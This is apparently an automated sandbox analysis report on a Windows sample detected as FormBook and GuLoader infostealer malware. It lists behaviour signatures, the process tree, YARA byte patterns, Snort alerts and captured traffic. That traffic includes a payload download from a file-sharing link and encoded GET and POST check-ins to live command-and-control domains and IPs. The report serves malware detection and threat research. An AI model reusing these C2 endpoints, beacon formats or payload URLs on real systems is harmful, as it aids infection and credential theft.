Windows Analysis Report
FRA.0038253.exe

Overview

General Information

Sample name: FRA.0038253.exe
Analysis ID: 1445848
MD5: b07b3994ad66a39937d9081eb64cd5f5
SHA1: 3fffe0fb2721f440909f99c5cb74d1d556ac45bb
SHA256: 53501f12261fc6003fb771379846bfc0bad23e331f0ccde984c431c22901881f

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses runas.exe to run programs with evaluated privileges
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • FRA.0038253.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\FRA.0038253.exe" MD5: B07B3994AD66A39937D9081EB64CD5F5)
    • FRA.0038253.exe (PID: 4956 cmdline: "C:\Users\user\Desktop\FRA.0038253.exe" MD5: B07B3994AD66A39937D9081EB64CD5F5)
      • aqqPMpTRvveOzLCNSEwwpwdiQeo.exe (PID: 2592 cmdline: "C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 3636 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 3C9AD13D268D1DFB106DD8C2017478C2)
          • aqqPMpTRvveOzLCNSEwwpwdiQeo.exe (PID: 7248 cmdline: "C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3652 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2a670:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2a670:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        No Sigma rule has matched

        AV Detection

        Source: FRA.0038253.exeAvira: detected
        Source: http://www.tycent520test.com/op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xYAvira URL Cloud: Label: malware
        Source: http://www.tycent520test.com/op6t/Avira URL Cloud: Label: malware
        Source: Yara matchFile source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: FRA.0038253.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.69.206:443 -> 192.168.11.30:49793 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.33.97:443 -> 192.168.11.30:49794 version: TLS 1.2
        Source: FRA.0038253.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: FRA.0038253.exe, 00000003.00000003.2871696616.000000003550B000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2963043943.0000000004307000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: FRA.0038253.exe, FRA.0038253.exe, 00000003.00000003.2871696616.000000003550B000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2963043943.0000000004307000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A19
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004065EA FindFirstFileA,FindClose,0_2_004065EA
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF

        Networking

        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49796 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49797 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49798 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49800 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49801 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49802 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49804 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49805 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49806 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49808 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49809 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49810 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49812 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49813 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49814 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49816 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49817 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49818 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49820 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49821 -> 185.76.64.170:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49822 -> 185.76.64.170:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49824 -> 185.76.64.170:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49825 -> 14.225.238.195:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49826 -> 14.225.238.195:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49828 -> 14.225.238.195:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49829 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49830 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49831 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49833 -> 139.162.5.234:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49834 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49835 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49837 -> 34.149.87.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49838 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49839 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49841 -> 34.174.122.2:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49842 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49843 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49845 -> 47.243.134.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49846 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49847 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49849 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49850 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49851 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49853 -> 37.140.192.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49854 -> 35.213.232.35:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49855 -> 35.213.232.35:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49857 -> 35.213.232.35:80
        Source: Joe Sandbox ViewIP Address: 139.162.5.234 139.162.5.234
        Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
        Source: Joe Sandbox ViewIP Address: 47.243.134.243 47.243.134.243
        Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
        Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
        Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
        Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=joKdiSi7KJbAbr0hs6/zjIJE4Behm4Eg2djH6+j8Qf7psFFLI9x7hyvntQ/EnvkMSFoG+HsqaOuOcF82SsMnr5xrxJqptXsvFzFrqoI6sGt4i0+JY4UwfJo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.l7aeh.usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.tycent520test.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=1X53ctdebY/A2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY=&x2=wN2xY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.century21morenoycia.mxConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=BHIAQNMULh6XRL1bx9H5u1ZiIAZR91nuzdCSdKuFpLeK/J0eLacPvObCKir816qtvGKK6uKZvELi45NaX+Eep6GNrYofejB/V2VvbUmxnRNQoZSvM+S992o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.facesofhoustontx.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.cngdesk.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=0Ny09Eq8ZBefbKkvkqaUMIZRDRlNq5VNIHijnsMzF4DJMnHDgghZ+20Zz3OB9IxSUXOfCxAz72VlILBCQfa8jvMelkWZW+WeIhBsswld1octwAWuto44rRQ=&x2=wN2xY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.shortfox.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=QBE+WD5B6Jkt78kVGAOSUjwaMNkkuAvPxxlILtocCDSSbk2FnDvYucSHDfntlLOKDiDLv1Q+MrvgQctCdQiXEWmDWyfYVOljC1RMawJvJ4/x6B/DgtrXZJ0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.ng-bo.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=2K+bizHsAgvfK4Jo/uhNk3UulAHtk/DKCDOKU6rtdoeHnbYDCZc/1AXytKkQw+QkOVrLH0jtXL2IhsFkUUnXJZ7gVE9SlKcPHqW4H/CrkavSbMd4d5+KoUM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.curty.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.beersekes.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=aEKUNFeJbfSYXwp4ZCE5pj6NM5Y9npuXTcZZ2VZLyy8DmHHct0wY69Uf2FlN/+Mr5yqkWwSEcnLthRGoVw08meHK6rNA3rJY5N4rrVRcMXWX5QnofEk8vUc=&iXoT=lfKx4XoXw4a8lZu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.getgoodscrub.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: unknown | HTTP traffic detected: POST /op6t/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en | Accept-Encoding: gzip, deflate, br | Host: www.tycent520test.com | Origin: http://www.tycent520test.com | Referer: http://www.tycent520test.com/op6t/ | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Connection: close | Content-Length: 202 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 | Data Ascii: nvddg=z4yy+rh/POA0h0IHcWGt/x0BHIW/+T4TkYb2MeNbMyQt6D8PzxWgY6m6M/HLaaQBBbfyPaRHXcAdIq7qeD7ybTi/RRph7BJJ8IWKflR5QVcYnwOM2KbhjmvjyZsoG1xELPNlZsSy74N5WvmcJd4Mu+DXwi91prnycH4DrUk/vslm/BANb+Ee34RyR0QsSqX2FQ==
        Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | content-length: 93 | cache-control: no-cache | content-type: text/html | connection: close | Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Length: 548 | Content-Type: text/html | Server: Pepyaka | X-Wix-Request-Id: 1716391913.2879038353616611341 | X-Content-Type-Options: nosniff | Accept-Ranges: bytes | Date: Wed, 22 May 2024 15:31:53 GMT | X-Served-By: cache-bfi-krnt7300043-BFI | X-Cache: MISS | X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLrS/q53T25jsaPnfPkSVOt8m++C2XkuTvnlRFg2XiSDL | Via: 1.1 google | glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Length: 548 | Content-Type: text/html | Server: Pepyaka | X-Wix-Request-Id: 1716391915.9949035481464927455 | X-Content-Type-Options: nosniff | Accept-Ranges: bytes | Date: Wed, 22 May 2024 15:31:55 GMT | X-Served-By: cache-bfi-krnt7300056-BFI | X-Cache: MISS | X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLpLkXwApeozbAp9OYhJGBzcG/hKs8AeY1T4OIbgnD+yx | Via: 1.1 google | glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Length: 548 | Content-Type: text/html | Server: Pepyaka | X-Wix-Request-Id: 1716391918.6989036252325017526 | X-Content-Type-Options: nosniff | Accept-Ranges: bytes | Date: Wed, 22 May 2024 15:31:58 GMT | X-Served-By: cache-bfi-krnt7300080-BFI | X-Cache: MISS | X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLquCTNcWTuCgj0HzMr4ZQgwm++C2XkuTvnlRFg2XiSDL | Via: 1.1 google | glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 22 May 2024 15:33:03 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 22 May 2024 15:33:06 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 22 May 2024 15:33:08 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 22 May 2024 15:33:11 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 22 May 2024 15:33:17 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
